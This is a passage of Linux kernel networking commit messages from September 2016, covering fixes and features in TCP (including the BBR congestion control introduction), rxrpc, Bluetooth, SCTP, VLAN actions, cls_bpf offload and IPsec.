   1) Proper driver init device resets in bnx2, from Baoquan He.

   2) Fix accounting overflow in __tcp_retransmit_skb(),
      sk_forward_alloc, and ip_idents_reserve, from Eric Dumazet.

   3) Fix crash in bna driver ethtool stats handling, from Ivan Vecera.

   4) Missing check of skb_linearize() return value in mac80211, from
      Johannes Berg.

   5) Endianness fix in nf_table_trace dumps, from Liping Zhang.

   6) SSN comparison fix in SCTP, from Marcelo Ricardo Leitner.

   7) Update DSA and b44 MAINTAINERS entries.

   8) Make input path of vti6 driver work again, from Nicolas Dichtel.

   9) Off-by-one in mlx4, from Sebastian Ott.

  10) Fix fallback route lookup handling in ipv6, from Vincent Bernat.

  11) Fix stack corruption on probe in qed driver, from Yuval Mintz.

  12) PHY init fixes in r8152 from Hayes Wang.

  13) Missing SKB free in irda_accept error path, from Phil Turnbull"

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (61 commits)
  tcp: properly account Fast Open SYN-ACK retrans
  tcp: fix under-accounting retransmit SNMP counters
  MAINTAINERS: Update b44 maintainer.
  net: get rid of an signed integer overflow in ip_idents_reserve()
  net/mlx4_core: Fix to clean devlink resources
  net: can: ifi: Configure transmitter delay
  vti6: fix input path
  ipmr, ip6mr: return lastuse relative to now
  r8152: disable ALDPS and EEE before setting PHY
  r8152: remove r8153_enable_eee
  r8152: move PHY settings to hw_phy_cfg
  r8152: move enabling PHY
  r8152: move some functions
  cxgb4/cxgb4vf: Allocate more queues for 25G and 100G adapter
  qed: Fix stack corruption on probe
  MAINTAINERS: Add an entry for the core network DSA code
  net: ipv6: fallback to full lookup if table lookup is unsuitable
  net/mlx5: E-Switch, Handle mode change failures
  net/mlx5: E-Switch, Fix error flow in the SRIOV e-switch init code
  net/mlx5: Fix flow counter bulk command out mailbox allocation
  ...
2016-09-22 08:49:25 -07:00
Michał Narajowski
7dc6f16c68 Bluetooth: Fix not updating scan rsp when adv off
Scan response data should not be updated unless there
is an advertising instance.

Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-22 17:48:23 +02:00
Arek Lichwa
dd7e39bbfc Bluetooth: Fix NULL pointer dereference in mgmt context
Adds missing callback assignment to cmd_complete in pending management command
context. Dump path involves security procedure performed on legacy (pre-SSP)
devices with service security requirements set to HIGH (16digits PIN).
It fails when shorter PIN is delivered by user.

[    1.517950] Bluetooth: PIN code is not 16 bytes long
[    1.518491] BUG: unable to handle kernel NULL pointer dereference at           (null)
[    1.518584] IP: [<          (null)>]           (null)
[    1.518584] PGD 9e08067 PUD 9fdf067 PMD 0
[    1.518584] Oops: 0010 [#1] SMP
[    1.518584] Modules linked in:
[    1.518584] CPU: 0 PID: 1002 Comm: kworker/u3:2 Not tainted 4.8.0-rc6-354649-gaf4168c #16
[    1.518584] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.9.3-20160701_074356-anatol 04/01/2014
[    1.518584] Workqueue: hci0 hci_rx_work
[    1.518584] task: ffff880009ce14c0 task.stack: ffff880009e10000
[    1.518584] RIP: 0010:[<0000000000000000>]  [<          (null)>]           (null)
[    1.518584] RSP: 0018:ffff880009e13bc8  EFLAGS: 00010293
[    1.518584] RAX: 0000000000000000 RBX: ffff880009eed100 RCX: 0000000000000006
[    1.518584] RDX: ffff880009ddc000 RSI: 0000000000000000 RDI: ffff880009eed100
[    1.518584] RBP: ffff880009e13be0 R08: 0000000000000000 R09: 0000000000000001
[    1.518584] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
[    1.518584] R13: ffff880009e13ccd R14: ffff880009ddc000 R15: ffff880009ddc010
[    1.518584] FS:  0000000000000000(0000) GS:ffff88000bc00000(0000) knlGS:0000000000000000
[    1.518584] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    1.518584] CR2: 0000000000000000 CR3: 0000000009fdd000 CR4: 00000000000006f0
[    1.518584] Stack:
[    1.518584]  ffffffff81909808 ffff880009e13cce ffff880009e0d40b ffff880009e13c68
[    1.518584]  ffffffff818f428d 00000000024000c0 ffff880009e13c08 ffffffff810ca903
[    1.518584]  ffff880009e13c48 ffffffff811ade34 ffffffff8178c31f ffff880009ee6200
[    1.518584] Call Trace:
[    1.518584]  [<ffffffff81909808>] ? mgmt_pin_code_neg_reply_complete+0x38/0x60
[    1.518584]  [<ffffffff818f428d>] hci_cmd_complete_evt+0x69d/0x3200
[    1.518584]  [<ffffffff810ca903>] ? rcu_read_lock_sched_held+0x53/0x60
[    1.518584]  [<ffffffff811ade34>] ? kmem_cache_alloc+0x1a4/0x200
[    1.518584]  [<ffffffff8178c31f>] ? skb_clone+0x4f/0xa0
[    1.518584]  [<ffffffff818f9d81>] hci_event_packet+0x8e1/0x28e0
[    1.518584]  [<ffffffff81a421f1>] ? _raw_spin_unlock_irqrestore+0x31/0x50
[    1.518584]  [<ffffffff810aea3e>] ? trace_hardirqs_on_caller+0xee/0x1b0
[    1.518584]  [<ffffffff818e6bd1>] hci_rx_work+0x1e1/0x5b0
[    1.518584]  [<ffffffff8107e4bd>] ? process_one_work+0x1ed/0x6b0
[    1.518584]  [<ffffffff8107e538>] process_one_work+0x268/0x6b0
[    1.518584]  [<ffffffff8107e4bd>] ? process_one_work+0x1ed/0x6b0
[    1.518584]  [<ffffffff8107e9c3>] worker_thread+0x43/0x4e0
[    1.518584]  [<ffffffff8107e980>] ? process_one_work+0x6b0/0x6b0
[    1.518584]  [<ffffffff8107e980>] ? process_one_work+0x6b0/0x6b0
[    1.518584]  [<ffffffff8108505f>] kthread+0xdf/0x100
[    1.518584]  [<ffffffff81a4297f>] ret_from_fork+0x1f/0x40
[    1.518584]  [<ffffffff81084f80>] ? kthread_create_on_node+0x210/0x210

Signed-off-by: Arek Lichwa <arek.lichwa@gmail.com>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
2016-09-22 17:37:21 +02:00
Laura Garcia Liebana
2b03bf7324 netfilter: nft_numgen: add number generation offset
Add support of an offset value for incremental counter and random. With
this option the sysadmin is able to start the counter to a certain value
and then apply the generated number.

Example:

	meta mark set numgen inc mod 2 offset 100

This will generate marks with the serie 100, 101, 100, 101, ...

Suggested-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Laura Garcia Liebana <nevola@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-22 16:33:05 +02:00
David S. Miller
60cd6e63ec RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+OQV/Sw1s6N8H32AQK/Gw//TF7n19v+gqUenh5m6xPYkVlZl6d/TRi+
 3JoG5pdNORxTDU7UgzkeuCywDTk5XUYsJs3TOzInRAdDedwfgIiwF3ZKw3Bo30vR
 cVUfG7GK4o+CLWifL3BILYMTJfkOnUS4sllylSqX/EOlPDEEspSRWTxXq+DCOGNZ
 1APBRD8XfA+IIC3fleMh+zSpKZ3ffc2c7djelzo2nCG3ku78U57B23TCyzp2tQNQ
 6ClvhOAwL2nMXF5vebtIU7ou6LUV/TdC4qTkQuz3du/+k+LOG/c8/6s6k70MgXQU
 L3DW3rcnrWxkyzDb5oQoGYSWG5x4gp/TazHbJE2kuUVhQma8eDbOAGRWJoxlSzoC
 LqHE+6q3KnwwXpbYd3DJ+jUI7pu7pUvub1cvJr0uxPcjRb4CzhHT/1OBUb9p4CJX
 /n8NFNXk+5qWsvLaPuNNBPs4pc2xgz/cotjKBYUznqObiq2xgeivZpbsEBOpSIT1
 2hl0EuyAi1Gwpi6qfW8oM6EGrlAzuG77cLcLnxrDz+GsHcgqUvdSuTh0P26eOh7D
 1V03kkfX9dIqkOc5xA9xAckopfG5BhQDiFsMV+5McZ2x8GtUdnMw8E7dsG8xIeY5
 yDzk9m6tD79PlqS7HJ7Fzj6owzqLUeJOI08y9EUSacBFKzNak1NVmcYcXd10rDFj
 duNM4rDi6zA=
 =3zfm
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160922-v2' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Preparation for slow-start algorithm [ver #2]

Here are some patches that prepare for improvements in ACK generation and
for the implementation of the slow-start part of the protocol:

 (1) Stop storing the protocol header in the Tx socket buffers, but rather
     generate it on the fly.  This potentially saves a little space and
     makes it easier to alter the header just before transmission (the
     flags may get altered and the serial number has to be changed).

 (2) Mask off the Tx buffer annotations and add a flag to record which ones
     have already been resent.

 (3) Track RTT on a per-peer basis for use in future changes.  Tracepoints
     are added to log this.

 (4) Send PING ACKs in response to incoming calls to elicit a PING-RESPONSE
     ACK from which RTT data can be calculated.  The response also carries
     other useful information.

 (5) Expedite PING-RESPONSE ACK generation from sendmsg.  If we're actively
     using sendmsg, this allows us, under some circumstances, to avoid
     having to rely on the background work item to run to generate this
     ACK.

     This requires ktime_sub_ms() to be added.

 (6) Set the REQUEST-ACK flag on some DATA packets to elicit ACK-REQUESTED
     ACKs from which RTT data can be calculated.

 (7) Limit the use of pings and ACK requests for RTT determination.

Changes:

 (V2) Don't use the C division operator for 64-bit division.  One instance
      should use do_div() and the other should be using nsecs_to_jiffies().

      The last two patches got transposed, leading to an undefined symbol
      in one of them.

      Reported-by: kbuild test robot <lkp@intel.com>
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 08:14:59 -04:00
David Howells
fc943f6777 rxrpc: Reduce the number of PING ACKs sent
We don't want to send a PING ACK for every new incoming call as that just
adds to the network traffic.  Instead, we send a PING ACK to the first
three that we receive and then once per second thereafter.

This could probably be made adjustable in future.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 08:49:22 +01:00
David Howells
0d4b103c00 rxrpc: Reduce the number of ACK-Requests sent
Reduce the number of ACK-Requests we set on DATA packets that we're sending
to reduce network traffic.  We set the flag on odd-numbered DATA packets to
start off the RTT cache until we have at least three entries in it and then
probe once per second thereafter to keep it topped up.

This could be made tunable in future.

Note that from this point, the RXRPC_REQUEST_ACK flag is set on DATA
packets as we transmit them and not stored statically in the sk_buff.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 08:49:20 +01:00
Yuchung Cheng
7e32b44361 tcp: properly account Fast Open SYN-ACK retrans
Since the TFO socket is accepted right off SYN-data, the socket
owner can call getsockopt(TCP_INFO) to collect ongoing SYN-ACK
retransmission or timeout stats (i.e., tcpi_total_retrans,
tcpi_retransmits). Currently those stats are only updated
upon handshake completes. This patch fixes it.

Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 03:33:01 -04:00
Yuchung Cheng
de1d657816 tcp: fix under-accounting retransmit SNMP counters
This patch fixes these under-accounting SNMP rtx stats
LINUX_MIB_TCPFORWARDRETRANS
LINUX_MIB_TCPFASTRETRANS
LINUX_MIB_TCPSLOWSTARTRETRANS
when retransmitting TSO packets

Fixes: 10d3be5692 ("tcp-tso: do not split TSO packets at retransmit time")
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 03:33:01 -04:00
David Howells
50235c4b5a rxrpc: Obtain RTT data by requesting ACKs on DATA packets
In addition to sending a PING ACK to gain RTT data, we can set the
RXRPC_REQUEST_ACK flag on a DATA packet and get a REQUESTED-ACK ACK.  The
ACK packet contains the serial number of the packet it is in response to,
so we can look through the Tx buffer for a matching DATA packet.

This requires that the data packets be stamped with the time of
transmission as a ktime rather than having the resend_at time in jiffies.

This further requires the resend code to do the resend determination in
ktimes and convert to jiffies to set the timer.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 08:21:24 +01:00
David Howells
7aa51da7c8 rxrpc: Expedite ping response transmission
Expedite the transmission of a response to a PING ACK by sending it from
sendmsg if one is pending.  We're most likely to see a PING ACK during the
client call Tx phase as the other side may use it to determine a number of
parameters, such as the client's receive window size, the RTT and whether
the client is doing slow start (similar to RFC5681).

If we don't expedite it, it's left to the background processing thread to
transmit.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 08:21:24 +01:00
David Howells
8e83134db4 rxrpc: Send pings to get RTT data
Send a PING ACK packet to the peer when we get a new incoming call from a
peer we don't have a record for.  The PING RESPONSE ACK packet will tell us
the following about the peer:

 (1) its receive window size

 (2) its MTU sizes

 (3) its support for jumbo DATA packets

 (4) if it supports slow start (similar to RFC 5681)

 (5) an estimate of the RTT

This is necessary because the peer won't normally send us an ACK until it
gets to the Rx phase and we send it a packet, but we would like to know
some of this information before we start sending packets.

A pair of tracepoints are added so that RTT determination can be observed.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 08:21:24 +01:00
Marcelo Ricardo Leitner
4a225ce395 sctp: make use of SCTP_TRUNC4 macro
And avoid the usage of '&~3'. This is the last place still not using
the macro.
Also break the line to make it easier to read.

Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 03:13:26 -04:00
Marcelo Ricardo Leitner
e2f036a972 sctp: rename WORD_TRUNC/ROUND macros
To something more meaningful these days, specially because this is
working on packet headers or lengths and which are not tied to any CPU
arch but to the protocol itself.

So, WORD_TRUNC becomes SCTP_TRUNC4 and WORD_ROUND becomes SCTP_PAD4.

Reported-by: David Laight <David.Laight@ACULAB.COM>
Reported-by: David Miller <davem@davemloft.net>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 03:13:26 -04:00
David S. Miller
ba1ba25d31 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec
Steffen Klassert says:

====================
pull request (net): ipsec 2016-09-21

1) Propagate errors on security context allocation.
   From Mathias Krause.

2) Fix inbound policy checks for inter address family tunnels.
   From Thomas Zeitlhofer.

3) Fix an old memory leak on aead algorithm usage.
   From Ilan Tayari.

4) A recent patch fixed a possible NULL pointer dereference
   but broke the vti6 input path.
   Fix from Nicolas Dichtel.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 02:56:23 -04:00
Eric Dumazet
f9616c35a0 tcp: implement TSQ for retransmits
We saw sch_fq drops caused by the per flow limit of 100 packets and TCP
when dealing with large cwnd and bursts of retransmits.

Even after increasing the limit to 1000, and even after commit
10d3be5692 ("tcp-tso: do not split TSO packets at retransmit time"),
we can still have these drops.

Under certain conditions, TCP can spend a considerable amount of
time queuing thousands of skbs in a single tcp_xmit_retransmit_queue()
invocation, incurring latency spikes and stalls of other softirq
handlers.

This patch implements TSQ for retransmits, limiting number of packets
and giving more chance for scheduling packets in both ways.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 02:44:16 -04:00
Eric Dumazet
adb03115f4 net: get rid of an signed integer overflow in ip_idents_reserve()
Jiri Pirko reported an UBSAN warning happening in ip_idents_reserve()

[] UBSAN: Undefined behaviour in ./arch/x86/include/asm/atomic.h:156:11
[] signed integer overflow:
[] -2117905507 + -695755206 cannot be represented in type 'int'

Since we do not have uatomic_add_return() yet, use atomic_cmpxchg()
so that the arithmetics can be done using unsigned int.

Fixes: 04ca6973f7 ("ip: make IP identifiers less predictable")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Jiri Pirko <jiri@resnulli.us>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 02:41:17 -04:00
Shmulik Ladkani
ecf4ee41d2 net: skbuff: Coding: Use eth_type_vlan() instead of open coding it
Fix 'skb_vlan_pop' to use eth_type_vlan instead of directly comparing
skb->protocol to ETH_P_8021Q or ETH_P_8021AD.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Reviewed-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 01:35:57 -04:00
Shmulik Ladkani
636c262808 net: skbuff: Remove errornous length validation in skb_vlan_pop()
In 93515d53b1
  "net: move vlan pop/push functions into common code"
skb_vlan_pop was moved from its private location in openvswitch to
skbuff common code.

In case skb has non hw-accel vlan tag, the original 'pop_vlan()' assured
that skb->len is sufficient (if skb->len < VLAN_ETH_HLEN then pop was
considered a no-op).

This validation was moved as is into the new common 'skb_vlan_pop'.

Alas, in its original location (openvswitch), there was a guarantee that
'data' points to the mac_header, therefore the 'skb->len < VLAN_ETH_HLEN'
condition made sense.
However there's no such guarantee in the generic 'skb_vlan_pop'.

For short packets received in rx path going through 'skb_vlan_pop',
this causes 'skb_vlan_pop' to fail pop-ing a valid vlan hdr (in the non
hw-accel case) or to fail moving next tag into hw-accel tag.

Remove the 'skb->len < VLAN_ETH_HLEN' condition entirely:
It is superfluous since inner '__skb_vlan_pop' already verifies there
are VLAN_ETH_HLEN writable bytes at the mac_header.

Note this presents a slight change to skb_vlan_pop() users:
In case total length is smaller than VLAN_ETH_HLEN, skb_vlan_pop() now
returns an error, as opposed to previous "no-op" behavior.
Existing callers (e.g. tc act vlan, ovs) usually drop the packet if
'skb_vlan_pop' fails.

Fixes: 93515d53b1 ("net: move vlan pop/push functions into common code")
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Pravin Shelar <pshelar@ovn.org>
Reviewed-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 01:35:57 -04:00
Shmulik Ladkani
45a497f2d1 net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action
TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If packet is vlan tagged, then the tag gets overwritten according to
user specified attributes.

For example, this allows user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 01:34:20 -04:00
Shmulik Ladkani
bfca4c520f net: skbuff: Export __skb_vlan_pop
This exports the functionality of extracting the tag from the payload,
without moving next vlan tag into hw accel tag.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-22 01:34:20 -04:00
David Howells
cf1a6474f8 rxrpc: Add per-peer RTT tracker
Add a function to track the average RTT for a peer.  Sources of RTT data
will be added in subsequent patches.

The RTT data will be useful in the future for determining resend timeouts
and for handling the slow-start part of the Rx protocol.

Also add a pair of tracepoints, one to log transmissions to elicit a
response for RTT purposes and one to log responses that contribute RTT
data.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 01:26:25 +01:00
David Howells
f07373ead4 rxrpc: Add re-sent Tx annotation
Add a Tx-phase annotation for packet buffers to indicate that a buffer has
already been retransmitted.  This will be used by future congestion
management.  Re-retransmissions of a packet don't affect the congestion
window managment in the same way as initial retransmissions.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 01:23:50 +01:00
David Howells
5a924b8951 rxrpc: Don't store the rxrpc header in the Tx queue sk_buffs
Don't store the rxrpc protocol header in sk_buffs on the transmit queue,
but rather generate it on the fly and pass it to kernel_sendmsg() as a
separate iov.  This reduces the amount of storage required.

Note that the security header is still stored in the sk_buff as it may get
encrypted along with the data (and doesn't change with each transmission).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-22 01:23:50 +01:00
Jakub Kicinski
9798e6fe4f net: act_mirred: allow statistic updates from offloaded actions
Implement .stats_update() callback.  The implementation
is generic and can be reused by other simple actions if
needed.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 19:50:03 -04:00
Jakub Kicinski
68d640630d net: cls_bpf: allow offloaded filters to update stats
Call into offloaded filters to update stats.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 19:50:03 -04:00
Jakub Kicinski
eadb41489f net: cls_bpf: add support for marking filters as hardware-only
Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_SW flag.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 19:50:02 -04:00
Jakub Kicinski
0d01d45f1b net: cls_bpf: limit hardware offload by software-only flag
Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_HW flag.
Unlike U32 and flower cls_bpf already has some netlink
flags defined.  Create a new attribute to be able to use
the same flag values as the above.

Unlike U32 and flower reject unknown flags.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 19:50:02 -04:00
Jakub Kicinski
332ae8e2f6 net: cls_bpf: add hardware offload
This patch adds hardware offload capability to cls_bpf classifier,
similar to what have been done with U32 and flower.

Signed-off-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Acked-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 19:50:02 -04:00
Florian Westphal
c2f672fc94 xfrm: state lookup can be lockless
This is called from the packet input path, we get lock contention
if many cpus handle ipsec in parallel.

After recent rcu conversion it is safe to call __xfrm_state_lookup
without the spinlock.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-09-21 12:37:29 +02:00
Nicolas Dichtel
63c43787d3 vti6: fix input path
Since commit 1625f45299, vti6 is broken, all input packets are dropped
(LINUX_MIB_XFRMINNOSTATES is incremented).

XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 is set by vti6_rcv() before calling
xfrm6_rcv()/xfrm6_rcv_spi(), thus we cannot set to NULL that value in
xfrm6_rcv_spi().

A new function xfrm6_rcv_tnl() that enables to pass a value to
xfrm6_rcv_spi() is added, so that xfrm6_rcv() is not touched (this function
is used in several handlers).

CC: Alexey Kodanev <alexey.kodanev@oracle.com>
Fixes: 1625f45299 ("net/xfrm_input: fix possible NULL deref of tunnel.ip6->parms.i_key")
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-09-21 10:09:14 +02:00
Nikolay Aleksandrov
b5036cd4ed ipmr, ip6mr: return lastuse relative to now
When I introduced the lastuse member I made a subtle error because it was
returned as an absolute value but that is meaningless to user-space as it
doesn't allow to see how old exactly an entry is. Let's make it similar to
how the bridge returns such values and make it relative to "now" (jiffies).
This allows us to show the actual age of the entries and is much more
useful (e.g. user-space daemons can age out entries, iproute2 can display
the lastuse properly).

Fixes: 43b9e12740 ("net: ipmr/ip6mr: add support for keeping an entry age")
Reported-by: Satish Ashok <sashok@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:58:23 -04:00
Neal Cardwell
0f8782ea14 tcp_bbr: add BBR congestion control
This commit implements a new TCP congestion control algorithm: BBR
(Bottleneck Bandwidth and RTT). A detailed description of BBR will be
published in ACM Queue, Vol. 14 No. 5, September-October 2016, as
"BBR: Congestion-Based Congestion Control".

BBR has significantly increased throughput and reduced latency for
connections on Google's internal backbone networks and google.com and
YouTube Web servers.

BBR requires only changes on the sender side, not in the network or
the receiver side. Thus it can be incrementally deployed on today's
Internet, or in datacenters.

The Internet has predominantly used loss-based congestion control
(largely Reno or CUBIC) since the 1980s, relying on packet loss as the
signal to slow down. While this worked well for many years, loss-based
congestion control is unfortunately out-dated in today's networks. On
today's Internet, loss-based congestion control causes the infamous
bufferbloat problem, often causing seconds of needless queuing delay,
since it fills the bloated buffers in many last-mile links. On today's
high-speed long-haul links using commodity switches with shallow
buffers, loss-based congestion control has abysmal throughput because
it over-reacts to losses caused by transient traffic bursts.

In 1981 Kleinrock and Gale showed that the optimal operating point for
a network maximizes delivered bandwidth while minimizing delay and
loss, not only for single connections but for the network as a
whole. Finding that optimal operating point has been elusive, since
any single network measurement is ambiguous: network measurements are
the result of both bandwidth and propagation delay, and those two
cannot be measured simultaneously.

While it is impossible to disambiguate any single bandwidth or RTT
measurement, a connection's behavior over time tells a clearer
story. BBR uses a measurement strategy designed to resolve this
ambiguity. It combines these measurements with a robust servo loop
using recent control systems advances to implement a distributed
congestion control algorithm that reacts to actual congestion, not
packet loss or transient queue delay, and is designed to converge with
high probability to a point near the optimal operating point.

In a nutshell, BBR creates an explicit model of the network pipe by
sequentially probing the bottleneck bandwidth and RTT. On the arrival
of each ACK, BBR derives the current delivery rate of the last round
trip, and feeds it through a windowed max-filter to estimate the
bottleneck bandwidth. Conversely it uses a windowed min-filter to
estimate the round trip propagation delay. The max-filtered bandwidth
and min-filtered RTT estimates form BBR's model of the network pipe.

Using its model, BBR sets control parameters to govern sending
behavior. The primary control is the pacing rate: BBR applies a gain
multiplier to transmit faster or slower than the observed bottleneck
bandwidth. The conventional congestion window (cwnd) is now the
secondary control; the cwnd is set to a small multiple of the
estimated BDP (bandwidth-delay product) in order to allow full
utilization and bandwidth probing while bounding the potential amount
of queue at the bottleneck.

When a BBR connection starts, it enters STARTUP mode and applies a
high gain to perform an exponential search to quickly probe the
bottleneck bandwidth (doubling its sending rate each round trip, like
slow start). However, instead of continuing until it fills up the
buffer (i.e. a loss), or until delay or ACK spacing reaches some
threshold (like Hystart), it uses its model of the pipe to estimate
when that pipe is full: it estimates the pipe is full when it notices
the estimated bandwidth has stopped growing. At that point it exits
STARTUP and enters DRAIN mode, where it reduces its pacing rate to
drain the queue it estimates it has created.

Then BBR enters steady state. In steady state, PROBE_BW mode cycles
between first pacing faster to probe for more bandwidth, then pacing
slower to drain any queue that created if no more bandwidth was
available, and then cruising at the estimated bandwidth to utilize the
pipe without creating excess queue. Occasionally, on an as-needed
basis, it sends significantly slower to probe for RTT (PROBE_RTT
mode).

BBR has been fully deployed on Google's wide-area backbone networks
and we're experimenting with BBR on Google.com and YouTube on a global
scale.  Replacing CUBIC with BBR has resulted in significant
improvements in network latency and application (RPC, browser, and
video) metrics. For more details please refer to our upcoming ACM
Queue publication.

Example performance results, to illustrate the difference between BBR
and CUBIC:

Resilience to random loss (e.g. from shallow buffers):
  Consider a netperf TCP_STREAM test lasting 30 secs on an emulated
  path with a 10Gbps bottleneck, 100ms RTT, and 1% packet loss
  rate. CUBIC gets 3.27 Mbps, and BBR gets 9150 Mbps (2798x higher).

Low latency with the bloated buffers common in today's last-mile links:
  Consider a netperf TCP_STREAM test lasting 120 secs on an emulated
  path with a 10Mbps bottleneck, 40ms RTT, and 1000-packet bottleneck
  buffer. Both fully utilize the bottleneck bandwidth, but BBR
  achieves this with a median RTT 25x lower (43 ms instead of 1.09
  secs).

Our long-term goal is to improve the congestion control algorithms
used on the Internet. We are hopeful that BBR can help advance the
efforts toward this goal, and motivate the community to do further
research.

Test results, performance evaluations, feedback, and BBR-related
discussions are very welcome in the public e-mail list for BBR:

  https://groups.google.com/forum/#!forum/bbr-dev

NOTE: BBR *must* be used with the fq qdisc ("man tc-fq") with pacing
enabled, since pacing is integral to the BBR design and
implementation. BBR without pacing would not function properly, and
may incur unnecessary high packet loss rates.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:01 -04:00
Yuchung Cheng
c0402760f5 tcp: new CC hook to set sending rate with rate_sample in any CA state
This commit introduces an optional new "omnipotent" hook,
cong_control(), for congestion control modules. The cong_control()
function is called at the end of processing an ACK (i.e., after
updating sequence numbers, the SACK scoreboard, and loss
detection). At that moment we have precise delivery rate information
the congestion control module can use to control the sending behavior
(using cwnd, TSO skb size, and pacing rate) in any CA state.

This function can also be used by a congestion control that prefers
not to use the default cwnd reduction approach (i.e., the PRR
algorithm) during CA_Recovery to control the cwnd and sending rate
during loss recovery.

We take advantage of the fact that recent changes defer the
retransmission or transmission of new data (e.g. by F-RTO) in recovery
until the new tcp_cong_control() function is run.

With this commit, we only run tcp_update_pacing_rate() if the
congestion control is not using this new API. New congestion controls
which use the new API do not want the TCP stack to run the default
pacing rate calculation and overwrite whatever pacing rate they have
chosen at initialization time.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-21 00:23:01 -04:00
Yuchung Cheng
77bfc174c3 tcp: allow congestion control to expand send buffer differently
Currently the TCP send buffer expands to twice cwnd, in order to allow
limited transmits in the CA_Recovery state. This assumes that cwnd
does not increase in the CA_Recovery.

